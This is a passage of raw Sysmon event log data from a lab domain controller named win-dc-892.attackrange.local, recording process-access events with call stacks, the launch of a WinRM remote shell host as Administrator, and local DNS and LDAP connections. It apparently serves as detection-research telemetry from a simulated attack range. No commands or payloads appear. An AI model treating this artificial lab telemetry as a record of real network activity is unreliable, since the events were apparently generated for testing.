12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.070{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6497-6064-4335-070000000000}0x735430HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.018{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.018{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.018{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.790{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53530-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.790{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53530-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.789{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63403- 354300x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.788{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53529-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.788{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53529-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.787{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59841- 354300x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.786{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55220- 354300x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.782{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54675-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.782{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54675-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.781{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62054- 354300x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.780{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local54674-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.780{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local54674-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.779{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60518- 354300x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.772{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58073-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.772{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58073-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.770{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58072-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.770{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58072-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.769{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59553- 354300x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.768{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55192- 354300x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.753{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65244-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.752{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65244-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.750{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local65243-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.750{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local65243-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.749{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58894-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.749{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58894-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.748{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56641- 354300x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.743{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT 